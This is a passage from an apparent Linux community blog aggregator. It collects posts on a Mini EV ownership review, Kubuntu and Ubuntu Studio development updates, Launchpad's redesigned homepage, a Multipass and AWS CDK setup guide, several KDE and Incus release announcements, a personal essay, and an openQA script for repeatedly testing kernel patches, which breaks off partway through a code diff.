The seats are comfortable, even for a relatively long drive, and being small, everything is very much within reach. I’m almost 6ft tall and fit just fine. However, with the seat far back, my view of traffic lights when in the front of a queue is somewhat limited. The mirror also obscures my view more than most cars, as it’s parallel to my eyes rather than “up and to the left” as it would be in a larger cabin.

There are two sunroofs, each with a manual sliding mesh shade on the underside. The front roof can be tilted or slid open using a switch in the overhead panel. The rear sunroof doesn’t open.

Interior

The interior is a mix of retro Mini styling and new fangled screens. It has a big round central circle harking back to the original Mini speedo. Here though, it contains a rectangular display. There are physical controls for air conditioning, seat warmers, parking assistance, media controls, navigation, the lot. While the display is a touch screen, that’s rarely needed when using the built-in software.

It looks like this, but with the steering wheel on the right (correct) side.

Mini interior

I should mention that I don’t like the buttons on the steering wheel, nor those immediately under the display. They’re flat rocker-style ones, which you have to look at to find. The previous generation of Mini had raised round buttons, which are much easier for fingers to find.

The built-in navigation system is pretty trashy, like most cars. I’ve never found a car with a decent navigation system that can beat Android Auto or Apple Car Play. I also like using Waze, Apple Maps, and a podcast app while driving.

In this photo, you can see the navigation display, which highlights the expected current range with the circle around the cars location. Also note the “mode” button which is one of the flat ones I dislike in the car. The lights around the display illuminate to show temperature of the heating, or volume of the audio system, while you adjust it.

Navigation

One benefit of the onboard navigation system is that driving instructions and lane recommendations appear on the Head-Up Display (HUD) in front of the driver. The downside of mobile apps on the mini is they don’t have access to the HUD, so I have to glance across at the central display to see where I need to turn. Alternatively, I could turn the volume on the mobile map app up, but that would interrupt podcasts in an annoying way.

I suspect this is a missing feature of the BMW on-board software, which may be fixed in a later release. I drove a brand new BMW which had a similar HUD that integrated with the navigation system on my phone. Mine doesn’t have that software though.

The back seats can be folded to provide more boot space, especially in a car with little luggage space. I’ve used the Mini for a ‘big shop’ with the seats folded down and can get plenty of ‘bags for life’ in there, full of groceries.

There’s the usual media controls on one side of the steering wheel, as well as cruise and speed limit control on the other. Window, sunroof and other important controls all have buttons in the expected places. A minimalist button Tesla, this is not.

There’s an induction phone charger inside the armrest. The best part about this is with Apple CarPlay, I can just hide the phone in there, charging, so I’m not distracted while driving. The worst part is I frequently forget the phone is in there, and leave it when walking away from the car.

Power

The Mini is a BEV (battery EV) instead of a PHEV (plug-in hybrid EV) - like a Prius or BMW i3, so it has no petrol engine but relies on the battery powering a single motor to propel the car.

The Mini is sold with only one battery option, a 30KwH capacity with an estimated 140-mile range. There’s a CCS (Combined Charging System (combo 2)) socket under a flap on the rear (right) driver’s side. So it can do slower AC charging or faster DC charging.

The car has all the cables required for charging from a 13-amp socket at home or a 7Kw domestic or public “slow” charger. Faster public chargers have integrated fat cables.

A few days before the car arrived, I had a charger installed at home on the outside wall of the house. I’m fortunate to have a driveway at the front of the house. So I typically park the car on it and plug in when I get out.

Sometimes, I forget or don’t bother if I know the battery still has plenty of charge and I do not have any upcoming long journeys. But more often than not, I try always to plug it in, even if it won’t be charging until the next day.

Charging

In my personal experience, most charges are done at home. I have charged in many places away from home, but that’s not very common for me. The last time I checked the stats, it had been around 86% charging at home and 14% on public chargers.

I often take a photo of the car while it’s charging in a public place. Usually to share on social media to spark a conversation about charging infrastructure. On this occasion I was using a charger in the car park at Chepstow Castle.

I know petrol heads often bleat about the very idea of waiting while the car fills up, but sometimes it leads to nice places, like this. This was a pretty slow charger, but I didn’t really care, as I had a castle to walk around!

Dragon charging

Sometimes the locations are less pretty. This is Chippenham Pit-Stop, which does a great breakfast while you wait for your car to charge.

Chippenham charging

Ohme at HOME

My home charger is made by Ohme. It has a display and a few weatherproof buttons to be directly operated without needing an app. However, a few additional features are only available if the app is installed.

The Ohme app can access my energy provider via an API which lets the charger know when is the optimal time to start changing the car, from a pricing perspective. That seems to work well with Octopus Energy, my domestic provider.

It’s possible to define multiple charging schedules to ensure the car is ready for departure at the time you’re leaving.

Ohme

The Ohme app is also supposed to be able to talk to the BMW API with my credentials, in order to talk to the car. This has never worked for me. I have had calls and emails with Ohme about this, but I gave up in frustration. It just doesn’t work.

That doesn’t stop the car from actually charging though. Indeed, according to the stats in the app (which I only discovered while writing this blog) - I’ve charged for over 720 hours at home in the last twelve months. The dip in November & December is explained below under “Crash repair”.

Ohme stats

Issues

There are a few issues I’ve had with the car.

App registration

The car has its own mobile connectivity, and talks to BMW periodically. But for that to work, you have to successfully pair the car with your phone app. The pairing process between the mobile app and the car itself should just be a case of entering the Vehicle Identification Number in the app. Sadly this didn’t work. I don’t know what was wrong, but it took around two weeks for it to be fixed.

Home Sweet Home

The onboard navigation system had my address wrong. The house number it showed for my home doesn’t exist, and mine wasn’t in the database. The house has been here and numbered correctly for over 50 years. It was only a minor thing because I happened to know where I lived, and how to get there. It just irritated me that my own car, on my driveway, thought it was somewhere else.

I called Mini customer services and they didn’t seem to think it was easily fixable, and I should just hope for a map update.

So I did the nerd thing, and found out who the map supplier was - “Nokia Here” - and submitted a request to fix the data there. Later, I got a map update from BMW which contained my fix. That’s one way to do it.

Unable to charge

Within a year of owning the car, it stopped charging at home. The AC charging port just wouldn’t work. I could charge at the fast public DC chargers nearby, but my home charger stopped working.

Unable to charge

When I reported the problem to BMW, their assumption was that the wall box on my house was broken. We disproved this by showing a different car charging from the home wall box, and my car refusing to charge from public AC chargers.

The BMW dealership were still very reluctant to accept that there was a problem with the car. I had to drive it to the dealership and put the car on their own slow charger to show them it failing to charge. Only once I’d done that did they allow me to book it in for repair the next day.

In a bit of a dick move, I drove around to empty the battery completely, rocking up to the dealership with the car angrily telling my it had 0% charge. That way they’d have to fix it to charge it to get it back to me. They did indeed fix the problem with the charging system, which took quite a while.

Zero

I got a rather fancy BMW i7 on loan while they repaired the car.

When I went to pick the car up, they were very apologetic that it took so long and gave me a bag of Mini merch as a gift. When I went to open the boot to put the bag away, I noticed that there was a panel unclipped and some disconnected wires dangling around in the boot. I had to call someone from the garage over to fix it before I could drive away.

I was a little sad that the car clearly hadn’t been fully checked over before I was given it back.

Unplugging

During cold weather in Winter, the charger plug sometimes gets stuck - frozen - into the socket. This can be quite frustrating as it’s impossible to set off to work while the cable is still attached to the house! I found some plumber grease which I smeared around the plug in the hope of lubricating and reducing the ingress or condensation of water. So far, that’s helped.

I took a wrong turn down a long A-road one night, which meant I didn’t have sufficient charge to get home without stopping to top up. I thought I’d try the internal navigation system, which has a database of charging stations.

The first location it took me to was a hotel. I drove around the car park and couldn’t find a charger at all. Not necessarily the navigation system’s fault, but the hotel signage, to be fair. I gave up, and chose the next nearest charger on the map. It confidently took me down some narrow lanes and stopped at a closed gate which was the entrance to a farm. It looked to me like a private residence.

I gave up and switched to an app on my phone, and ended up at a nearby Tesla charging station where there we many free spaces, and I was able to charge with ease. It possibly should have offered me that one first!

App nagging

As I mentioned above, there is a Mini app for Android and iOS for managing the car. In it you can do some simple things like lock and unlock the car, turn the lights on, and enable the climate control before setting off. It also has a record of charging sessions, a map for finding chargers, and other useful information like locating the car, and showing battery charge level and estimated range.

It nags you constantly to tell them how great or bad the app is, and inexplicably on a scale of 0 to 10, whether you’d recommend it to friends or colleagues. I cannot fathom the kind of person who recommends apps to friends who do not own the car which the app is for. It’s completely mental.

Rating

Every time the dialog comes up - and it’s come up a lot - I rate the app zero, and leave an increasingly irritated message to the developers to stop asking me. I have also filed a ticket with BMW. Their engineers came back to me with details of exactly how often it asks, based on how often you open the app, and the interval between one opening and the next.

You can’t turn this off. It’s super irritating, and I still get asked two years later. I still give it a zero, despite the app having some useful features.

Full flaps

The charge port is covered by a hinged flap, just like in a petrol car. The Mini recently started nagging me that the flap was open when it wasn’t. No amount of opening and closing would stop the car nagging me. Thankfully it still let me drive with a little warning triangle on screen. I let the dealership know, and they fixed it during the upcoming maintenance.

Crash repair

In November my wife was involved in a crash when someone pulled out in front of her from behind traffic. She was only minorly injured, and the car was structurally fine, but a bit smashed up at the front. The other driver was at fault, and it was all sorted out via insurance. The local BMW-approved repair centre had the car from November to January while I had a hire car on loan. The car came back as good as new.

No spare tyre

It’s a small car, so there’s no room for a spare wheel. I had a puncture recently and managed to limp the car back home. I pressed the SOS button in the car and got put through to a friendly agent.

They organised a BMW engineer to come out and change the wheel. He arrived very quickly, jumped out of his van and took the wheel off my car, replacing it with a spare he had in the van.

He then put my wheel in the boot of my car and asked me to text him know once I’d got mine fixed, so he could pick his spare up again. I got it fixed within a day or so, and left his spare somewhere safe, as I was out at work. He happily came and collected it. I was pretty pleased with this whole experience.

Maintenance

As I got closer to the two-year anniversary of ownership, the app started to remind me to book the car for a service. There’s a feature in the app to just press a button, and get taken to a page where you can book the car in. The links are all broken and always have been. I don’t have the energy to call BMW to tell them it’s all broken. They should do better QA on the app.

Eventually I just called the garage to get the car maintained. There was a scheduled two-year inspection, a low priority recall, brake check and my broken ‘fuel flap’ to fix. They had the car all day and everything was complete when I picked it up at the end of the day.

The fact that there’s no oil changes, oil filter replacement, spark plug replacments, timing chain/belts, and many other parts that fail on an EV is quite attractive. But there’s still a regular service which needs doing.

Some argue that due to the car having a one-pedal driving mode, where regenerative braking slows tha car down, drivers are less likely to wear out the brakes. However I’ve also seen it asserted that some cars actually use both regenerative braking and the physical disc brakes without letting the driver know. I have no idea whether the Mini actually “smartly” applies the brakes, or if it only does so when I press the brake pedal.

Conclusion

I love the Mini EV. I love driving it, and often make excuses to drive somewhere, or I’ll go the ‘long way round’ in order to spend more time in it. It’s not perfect, but it’s super fun to drive.

As for it being my first EV. While the network of public EV chargers isn’t amazing, there’s enough where I live and travel to service my requirements. I don’t think I’ll go back to a petrol car anytime soon.

We’re also considering replacing the wifes car soon, and will look at electric options for that too.

There’s a new refreshed Mini model out, that the local dealership salespeople seem to want me to test drive. Having seen it on video, but not in person, I’m not convinced I’ll like it. We’ll see.

on March 03, 2024 12:00 PM

March 01, 2024

First I would like to give a big congratulations to KDE for a superb KDE 6 mega release 🙂 While we couldn’t go with 6 on our upcoming LTS release, I do recommend KDE neon if you want to give it a try! I want to say it again, I firmly stand by the Kubuntu Council in the decision to stay with the rock solid Plasma 5 for the 24.04 LTS release. The timing was just to close to feature freeze and the last time we went with the shiny new stuff on an LTS release, it was a nightmare ( KDE 4 anyone? ). So without further ado, my weekly wrap-up.

Kubuntu:

Continuing efforts from last week Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads. , it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11 as it is a bug fix release 🙂 and right now it is all about the finding and fixing bugs! Aside from many uploads my accomplishments this week are:

  • Kept a close eye on Excuses and fixed tests as needed. Seems riscv64 tests were turned off by default which broke several of our builds.
  • I did a complete revamp of our seed / kubuntu-desktop meta package! I have ensured we are following KDE packaging recommendations. Unfortunately, we cannot ship maliit-keyboard as we get hit by LP 2039721 which makes for an unpleasant experience.
  • I did some more work on our custom plasma-welcome which now just needs some branding, which leads to a friendly reminder the contest is still open! https://kubuntu.org/news/kubuntu-graphic-design-contest/
  • Bug triage! Oh so many bugs! From back when I worked on Kubuntu 10 years ago and plasma5 was new.. I am triaging and reducing this list to more recent bugs ( which is a much smaller list ). This reaffirms our decision to go with a rock solid stable Plasma5 for this LTS release.
  • I spent some time debugging kio-gdrive which no longer works ( It works in Jammy ) so I am tracking down what is broken. I thought it was 2FA but my non 2FA doesn’t work either, it just repeatedly throws up the google auth dialog. So this is still a WIP. It was suggested to me to disable online accounts all together, but I would prefer to give users the full experience.
  • Fixed our ISO builds. We are still not quite ready for testers as we have some Calamares fixes in the pipeline. Be on the lookout for a call for testers soon 🙂
  • Wrote a script to update our ( Kubuntu ) packageset to cover all the new packages accumulated over the years and remove packages that are defunct / removed.

What comes next? Testing, testing, testing! Bug fixes and of course our re-branding. My focus is on bug triage right now. I am also working on new projects in launchpad to easily track our bugs as right now they are all over the place and hard to track down.

Snaps:

I have started the MRs to fix our latest 23.08.5 snaps, I hope to get these finished in the next week or so. I have also been speaking to a prospective student with some GSOC ideas that I really like and will mentor, hopefully we are not too late.

Happy with my work? My continued employment depends on you! Please consider a donation http://kubuntu.org/donate

Thank you!

on March 01, 2024 04:38 PM

Launchpad’s new homepage

Launchpad has been around for a while, and its frontpage has remained untouched for a few years now.

If you go into launchpad.net, you’ll notice it looks quite different from what it has looked like for the past 10 years – it has been updated! The goal was to modernize it while trying to keep it looking like Launchpad. The contents have remained the same with only a few text additions, but there were a lot of styling changes.

The most relevant change is that the frontpage now uses Vanilla components (https://vanillaframework.io/docs). This alone, not only made the layout look more modern, but also made it better for a new curious user reaching the page from a mobile device. The accessibility score of the page – calculated with Google’s Lighthouse extension – increased from a 75 to an almost perfect 98!

Given the frontpage is so often the first impression users get when they want to check out Launchpad, we started there. But in the future, we envision the rest of Launchpad looking more modern and having a more intuitive UX.

As a final note, thank you to Peter Makowski for always giving a helping hand with frontend changes in Launchpad.

If you have any feedback for us, don’t forget to reach out in any of our channels. For feature requests you can reach us as feedback@launchpad.net or open a report in https://bugs.launchpad.net/launchpad.

To conclude this post, here is what Launchpad looked like in 2006, yesterday and today.


Launchpad in 2006

Launchpad yesterday

Launchpad today

on March 01, 2024 01:55 PM

February 25, 2024

I want to be able to connect to the environment using Visual Studio Code, so first we need to create a SSH key:

ssh-keygen -t rsa

We need a configuration YAML, replace <generated ssh-rsa key> with the above key, saved as cloud-init.yaml:

groups:
  - vscode
runcmd:
  - adduser ubuntu vscode
ssh_authorized_keys:
  - ssh-rsa <generated ssh-rsa key>

Assuming you’ve got Multipass installed (if not sudo snap install multipass) then:

multipass launch mantic --name ubuntu-cdk --cloud-init 

We’ll come back to Visual Studio Code later but first lets set everything up in the VM. We need to install aws-cli which I want to use with SSO (hence why we installed Mantic).

multipass shell ubuntu-cdk
sudo apt install awscli
aws configure sso

Follow the prompts and sign in to AWS as usual. Then install CDK:

sudo apt install nodejs npm
sudo npm install -g aws-cdk

Almost there, lets bootstrap1 (provisioning resources needed to make deployments) substituting the relevant values:

cdk bootstrap aws://<account>/<region> --profile <profile>

You should see a screen like this:

Create a new CDK application by creating a new folder, changing into it and initialising CDK:

cdk init app --language python
source .venv/bin/activate
python -m pip install -r requirements.txt

And that’s about it, except for Visual Studio Code. You’ll need to install Microsoft’s Remote-SSH extension:

You can get the IP address from multipass list, then in Code add a new SSH connection using ubuntu@<ip>:

Accept the various options presented and you’re there!

VSCode
  1. Bootstrapping provisions resources in your environment such as an Amazon Simple Storage Service (Amazon S3) bucket for storing files and AWS Identity and Access Management (IAM) roles that grant permissions needed to perform deployments. These resources get provisioned in an AWS CloudFormation stack, called the bootstrap stack. It is usually named CDKToolkit. Like any AWS CloudFormation stack, it will appear in the AWS CloudFormation console of your environment once it has been deployed. ↩
on February 25, 2024 10:01 PM

Plasma Pass 1.2.2

Jonathan Riddell

Plasma Pass is a Plasma applet for the Pass password manager

This release includes build fixes for Plasma 6, due to be released later this week.

URL: https://download.kde.org/stable/plasma-pass/
Sha256: 2a726455084d7806fe78bc8aa6222a44f328b6063479f8b7afc3692e18c397ce
Signed by E0A3EB202F8E57528E13E72FD7574483BB57B18D Jonathan Esk-Riddell <jr@jriddell.org>
https://jriddell.org/esk-riddell.gpg

on February 25, 2024 11:57 AM

February 23, 2024

As we get to the close of February 2024, we’re also getting close to Feature Freeze for Ubuntu Studio 2024 and, therefore, a closer look at what Ubuntu Studio 24.04 LTS will look like!

Before we get to that, however, we do want to let everyone know that community donations are down. We understand these are trying times for us all, and we just want to remind everyone that the creation and maintenance of Ubuntu Studio does come at some expense, such as electricity, internet, and equipment costs. All of that is in addition to the tireless hours our project leader, Erich Eickmeyer, is putting into this project daily.

Additionally, some recurring donations are failing. We’re not sure if they’re due to expired payment methods or inadequate funds, but we have no way to reach the people whose recurring donations have failed other than this method. So, if you have received any kind of notice, we kindly ask that you would check to see why those donations are failing. If you’d like to cancel, then that’s not a problem either.

If you find Ubuntu Studio useful or agree with its mission, we would ask that you would ask that you would contribute a donation or subscribe using one of the methods below.

Ubuntu Studio Will Always Remain a Free Download. That Will Not Change. The work that goes into producing it, however, is not free, and for that reason, we ask for voluntary donations.

Donate using PayPal
Donations are Monthly or One-Time
Donate using Liberapay
Donate using Liberapay
Donations are
Weekly, Monthly, or Annually
Donate using Patreon
Become a Patron!Donations are
Monthly


The New Installer

Progress has been made on the new installer, and for a while, it was working. However, at this time, the code is entirely in the hands of the Ubuntu Desktop Team at Canonical and we at Ubuntu Studio have no control over it.

This is currently where it gets stuck. We have no control over this at present.

Additionally, while we do appreciate testing, no amount of testing or bug reporting will fix this, so we ask that you be patient.

Wallpaper Competition

Our Wallpaper Competition for Ubuntu Studio 24.04 LTS is underway! We’ve received a handful of submissions but would love to see more!

Moving from IRC back to Matrix

Our support chat is moving back from IRC to Matrix! As you may recall, we had a Matrix room as our support chat until recently. However, the entire Ubuntu community has now begun a migration to Matrix for our communication needs, and Ubuntu Studio will be following. Stay tuned for more information to that, but also our links will be changing on the website, and the menu links will default to Matrix in Ubuntu Studio 24.04 LTS’s release.

PulseAudio-Jack/Studio Controls Deprecation

Beginning in Ubuntu Studio 24.04 LTS, the old PulseAudio-JACK bridging/configuration, while still installable and usable with Studio Controls, will no longer be supported and will not be recommended for use. For most people, the default configuration using PipeWire with the PipeWire-JACK configuration enabled, which can be disabled on-the-fly if one wishes to use JACKd2 with QJackCtl.

While Studio Controls started out as our in-house-built Ubuntu Studio Controls, it is no longer useful as its functionality has largely been replaced by the full low-latency audio integration and bridging PipeWire has provided.


With that, we hope our next update will provide you with better news regarding the installer, so keep your eyes on this space!

on February 23, 2024 10:48 PM

Announcing Incus 0.6

Stéphane Graber

Looking for something to do this weekend? How about trying out the all new Incus 0.6!

This Incus release is quite the feature packed one! It comes with an all new storage driver to allow a shared disk to be used for storage across a cluster. On top of that we also have support for backing up and restoring storage buckets, control over accessing of shared block devices, the ability to list images across all projects, a number of OVN improvements and more!

The full announcement and changelog can be found here.
And for those who prefer videos, here’s the release overview video:

You can take the latest release of Incus up for a spin through our online demo service at: https://linuxcontainers.org/incus/try-it/

And as always, my company is offering commercial support on Incus, ranging from by-the-hour support contracts to one-off services on things like initial migration from LXD, review of your deployment to squeeze the most out of Incus or even feature sponsorship. You’ll find all details of that here: https://zabbly.com/incus

Donations towards my work on this and other open source projects is also always appreciated, you can find me on Github Sponsors, Patreon and Ko-fi.

Enjoy!

on February 23, 2024 10:17 PM
Witch Wells AZ SunsetWitch Wells AZ Sunset

It has been a very busy 3 weeks here in Kubuntu!

Kubuntu 22.04.4 LTS has been released and can be downloaded from here: https://kubuntu.org/getkubuntu/

Work done for the upcoming 24.04 LTS release:

  • Frameworks 5.115 is in proposed waiting for the Qt transition to complete.
  • Debian merges for Plasma 5.27.10 are done, and I have confirmed there will be another bugfix release on March 6th.
  • Applications 23.08.5 is being worked on right now.
  • Added support for riscv64 hardware.
  • Bug triaging and several fixes!
  • I am working on Kubuntu branded Plasma-Welcome, Orca support and much more!
  • Aaron and the Kfocus team has been doing some amazing work getting Calamares perfected for release! Thank you!
  • Rick has been working hard on revamping kubuntu.org, stay tuned! Thank you!
  • I have added several more apparmor profiles for packages affected by https://bugs.launchpad.net/ubuntu/+source/kgeotag/+bug/2046844
  • I have aligned our meta package to adhere to https://community.kde.org/Distributions/Packaging_Recommendations and will continue to apply the rest of the fixes suggested there. Thanks for the tip Nate!

We have a branding contest! Please do enter, there are some exciting prizes https://kubuntu.org/news/kubuntu-graphic-design-contest/

Debian:

I have uploaded to NEW the following packages:

  • kde-inotify-survey
  • plank-player
  • aura-browser

I am currently working on:

  • alligator
  • xwaylandvideobridge

KDE Snaps:

KDE applications 23.08.5 have been uploaded to Candidate channel, testing help welcome. https://snapcraft.io/search?q=KDE I have also working on bug fixes, time allowing.

My continued employment depends on you, please consider a donation! https://kubuntu.org/donate/

Thank you for stopping by!

~Scarlett

on February 23, 2024 11:42 AM

February 22, 2024

Thanks to all the hard work from our contributors, Lubuntu 22.04.4 LTS has been released. With the codename Jammy Jellyfish, Lubuntu 22.04 is the 22nd release of Lubuntu, the eighth release of Lubuntu with LXQt as the default desktop environment. Support lifespan Lubuntu 22.04 LTS will be supported for 3 years until April 2025. Our […]
on February 22, 2024 08:23 PM

We are pleased to announce the release of the next version of our distro, the fourth 22.04 LTS point release. The LTS version is supported for 3 years while the regular releases are supported for 9 months. The new release rolls-up various fixes and optimizations by Ubuntu Budgie team, that have been released since the 22.04.3 release in August: For the adventurous among our community we…

Source

on February 22, 2024 06:15 PM

February 21, 2024

Oxygen Icons 6 Released

Jonathan Riddell

Oxygen Icons is an icon theme for use with any XDG compliant app and desktop.

It is part of KDE Frameworks 6 but is now released independently to save on resources.

This 6.0.0 release requires to be built with extra-cmake-modules from KF 6 which is not yet released, distros may want to wait until next week before building it.

Distros which ship this version can drop the version released as part of KDE Frameworks 5.

sha256: 28ec182875dcc15d9278f45ced11026aa392476f1f454871b9e2c837008e5774

URL: https://download.kde.org/stable/oxygen-icons/

Signed by E0A3EB202F8E57528E13E72FD7574483BB57B18D Jonathan Esk-Riddell <jr@jriddell.org>
https://jriddell.org/esk-riddell.gpg

on February 21, 2024 10:20 AM

January 30, 2024

There’s a YouTube channel called Clickspring, run by an Australian bloke called Chris who is a machinist: a mechanical engineer with a lathe and a mill and all manner of little tools. I am not a machinist — at school I was fairly inept at what we called CDT, for Craft Design and Technology, and what Americans much more prosaically call “shop class”. My dad was, though, or an engineer at least. Although Chris builds clocks and beautiful brass mechanisms, and my dad built aeroplanes. Heavy engineering. All my engineering is software, which actual engineers don’t think is engineering at all, and most of the time I don’t either.

You can romanticise it: claim that software development isn’t craft, it’s art. And there is a measure of truth in this. It’s like writing, which is the other thing I spend a lot of time doing for money; that’s an art, too.

If you’re doing it right, at least.

Most of the writing that’s done, though, isn’t art. And most of the software development isn’t, either. Or most of the engineering. For every one person creating beauty in prose or code or steel, there are fifty just there doing the job with no emotional investment in what they’re doing at all. Honestly, that’s probably a good thing, and not a complaint. While I might like the theoretical idea of a world where everything is hand made by someone who cares, I don’t think that you should have to care in order to get paid. The people who are paying you don’t care, so you shouldn’t have to either.

It’s nice if you can swing it so you get both, though.

The problem is that it’s not possible to instruct someone to give a damn. You can’t regulate the UK government into giving a damn about people who fled a war to come here to find their dream of being a nurse, you can’t regulate Apple bosses into giving a damn about the open web, you can’t regulate CEOs into giving a damn about their employees or governments about their citizens or landlords about their tenants. That’s not what regulation is for; people who give a damn largely don’t need regulation because they want to do the right thing. They might need a little steering into knowing what the right thing is, but that’s not the same.

No, regulation is there as a reluctant compromise: since you can’t make people care, the best you can do is in some rough and ready fashion make them behave in a similar way to the way they would if they did. Of course, this is why the most insidious kind of response is not an attempt to evade responsibility but an attack on the system of regulation itself. Call judges saboteurs or protesters criminals or insurgents patriots. And why the most heinous betrayal is one done in the name of the very thing you’re destroying. Claim to represent the will of the people while hurting those people. Claim to be defending the law while hiding violence and murder behind a badge. Claim privacy as a shield for surveillance or for exclusion. We all sorta thought that the system could protect us, that those with the power could be trusted to use it at least a little responsibly. And the last year has been one more in a succession of years demonstrating just how wrong that is. This and no other is the root from which a tyrant springs; when he first appears he is a protector.

The worst thing about it is that the urge to protect other people is not only real but the best thing about ourselves. When it’s actually real. Look after others, especially those who need it, and look after yourself, because you’re one of the people who needs it.

Chris from Clickspring polishes things to a high shine using tin, which surprised me. I thought bringing out the beauty in something needed a soft cloth but no, it’s done with metal. Some things, like silver, are basically shiny with almost no effort; there’s a reason people have prized silver things since before we could even write down why, and it’s not just because you could find lumps of it lying around the place with no need to build a smelting furnace. Silver looks good, and makes you look good in turn. Tin is useful, and it helps polish other things to a high shine.

Today’s my 48th birthday. A highly composite number. The ways Torah wisdom is acquired. And somewhere between silver and tin. That sounds OK to me.

on January 30, 2024 09:50 PM

January 25, 2024

Linux kernel getting a livepatch whilst running a marathon. Generated with AI.

Livepatch service eliminates the need for unplanned maintenance windows for high and critical severity kernel vulnerabilities by patching the Linux kernel while the system runs. Originally the service launched in 2016 with just a single kernel flavour supported.

Over the years, additional kernels were added: new LTS releases, ESM kernels, Public Cloud kernels, and most recently HWE kernels too.

Recently livepatch support was expanded for FIPS compliant kernels, Public cloud FIPS compliant kernels, and as well IBM Z (mainframe) kernels. Bringing the total of kernel flavours support to over 60 distinct kernel flavours supported in parallel. The table of supported kernels in the documentation lists the supported kernel flavours ABIs, the duration of individual build's support window, supported architectures, and the Ubuntu release. This work was only possible thanks to the collaboration with the Ubuntu Certified Public Cloud team, engineers at IBM for IBM Z (s390x) support, Ubuntu Pro team, Livepatch server & client teams.

It is a great milestone, and I personally enjoy seeing the non-intrusive popup on my Ubuntu Desktop that a kernel livepatch was applied to my running system. I do enable Ubuntu Pro on my personal laptop thanks to the free Ubuntu Pro subscription for individuals.

What's next? The next frontier is supporting ARM64 kernels. The Canonical kernel team has completed the gap analysis to start supporting Livepatch Service for ARM64. Upstream Linux requires development work on the consistency model to fully support livepatch on ARM64 processors. Livepatch code changes are applied on a per-task basis, when the task is deemed safe to switch over. This safety check depends mostly on kernel stacktraces. For these checks, CONFIG_HAVE_RELIABLE_STACKTRACE needs to be available in the upstream ARM64 kernel. (see The Linux Kernel Documentation). There are preliminary patches that enable reliable stacktraces on ARM64, however these turned out to be problematic as there are lots of fix revisions that came after the initial patchset that AWS ships with 5.10. This is a call for help from any interested parties. If you have engineering resources and are interested in bringing Livepatch Service to your ARM64 platforms, please reach out to the Canonical Kernel team on the public Ubuntu Matrix, Discourse, and mailing list. If you want to chat in person, see you at FOSDEM next weekend.

on January 25, 2024 06:01 PM
Lubuntu 23.04 has reached end-of-life as of today, January 25, 2024. It will no longer receive software updates (including security fixes) or technical support. All users are urged to upgrade to Lubuntu 23.10 as soon as possible to stay secure. You can upgrade to Lubuntu 23.10 without reinstalling Lubuntu from scratch by following the official […]
on January 25, 2024 04:18 PM

This is a follow up to my previous post about How to test things with openQA without running your own instance, so you might want to read that first.

Now, while hunting for bsc#1219073 which is quite sporadic, and took quite some time to show up often enough so that became noticeable and traceable, once stars aligned and managed to find a way to get a higher failure rate, I wanted to have a way for me and for the developer to test the kernel with the different patches to help with the bisecting and ease the process of finding the culprit and finding a solution for it.

I came with a fairly simple solution, using the --repeat parameter of the openqa-cli tool, and a simple shell script to run it:

```bash
$ cat ~/Downloads/trigger-kernel-openqa-mdadm.sh
# the kernel repo must be the one without https; tests don't have the kernel CA installed
KERNEL="KOTD_REPO=http://download.opensuse.org/repositories/Kernel:/linux-next/standard/"

REPEAT="--repeat 100" # using 100 by default
JOBS="https://openqa.your.instan.ce/tests/13311283 https://openqa.your.instan.ce/tests/13311263 https://openqa.your.instan.ce/tests/13311276 https://openqa.your.instan.ce/tests/13311278"
BUILD="bsc1219073"
for JOB in $JOBS; do 
	openqa-clone-job --within-instance $JOB CASEDIR=https://github.com/foursixnine/os-autoinst-distri-opensuse.git#tellmewhy ${REPEAT} \
		_GROUP=DEVELOPERS ${KERNEL} BUILD=${BUILD} FORCE_SERIAL_TERMINAL=1\
		TEST="${BUILD}_checkmdadm" YAML_SCHEDULE=schedule/qam/QR/15-SP5/textmode/textmode-skip-registration-extra.yaml INSTALLONLY=0 DESKTOP=textmode\
		|& tee jobs-launched.list;
done;

There are few things to note here:

  • the kernel repo must be the one without https; tests don’t have the CA installed by default.
  • the --repeat parameter is set to 100 by default, but can be changed to whatever number is desired.
  • the JOBS variable contains the list of jobs to clone and run, having all supported architecures is recommended (at least for this case)
  • the BUILD variable can be anything, but it’s recommended to use the bug number or something that makes sense.
  • the TEST variable is used to set the name of the test as it will show in the test overview page, you can use TEST+=foo if you want to append text instead of overriding it, the --repeat parameter, will append a number incrementally to your test, see os-autoinst/openQA#5331 for more details.
  • the YAML_SCHEDULE variable is used to set the yaml schedule to use, there are other ways to modify the schedule, but in this case I want to perform a full installation

Running the script

  • Ensure you can run at least the openQA client; if you need API keys, see post linked at the beginning of this post
  • replace the kernel repo with your branch in line 5
  • run the script $ bash trigger-kernel-openqa-mdadm.sh and you should get the following, times the --repeat if you modified it
1 job has been created:
 - sle-15-SP5-Full-QR-x86_64-Build134.5-skip_registration+workaround_modules@64bit -> https://openqa.your.instan.ce/tests/13345270

Each URL, will be a job triggered in openQA, depending on the load and amount of jobs, you might need to wait quite a bit (some users can help moving the priority of these jobs so it executes faster)

The review stuff:

Looking at the results

  • Go to https://openqa.your.instan.ce/tests/overview?distri=sle&build=bsc1219073&version=15-SP5 or from any job from the list above click on Job groups menu at the top, and select Build bsc1219073
  • Click on “Filter”
  • type the name of the test module to filter in the field Module name, e.g mdadm, and select the desired result of such test module e.g failed (you can also type, and select multiple result types)
  • Click Apply
  • The overall summary of the build overview page, will provide you with enough information to calculate the pass/fail rate.

A rule of thumb: anything above 5% is bad, but you need to also understand your sample size + the setup you’re using; YMMV.

Ain’t nobody got time to wait

The script will generate a file called: jobs-launched.list, in case you absolutely need to change the priority of the jobs, set it to 45, so it runs higher than default priority, which is 50 cat jobs-launched.list | grep https | sed -E 's/^.*->\s.*tests\///' | xargs -r -I {} bash -c "openqa-cli api --osd -X POST jobs/{}/prio prio=45; sleep 1"

The magic

The actual magic is in the schedule, so right after booting the system and setting it up, before running the mdadm test, I inserted the update_kernel module, which will add the kernel repo specified by KOTD_REPO, and install the kernel from there, reboot the system, and leave the system ready for the actual test, however I had to add very small changes:

---
 tests/kernel/update_kernel.pm | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/kernel/update_kernel.pm b/tests/kernel/update_kernel.pm
index 1d6312bee0dc..048da593f68f 100644
--- a/tests/kernel/update_kernel.pm
+++ b/tests/kernel/update_kernel.pm
@@ -398,7 +398,7 @@ sub boot_to_console {
 sub run {
     my $self = shift;
 
-    if ((is_ipmi && get_var('LTP_BAREMETAL')) || is_transactional) {
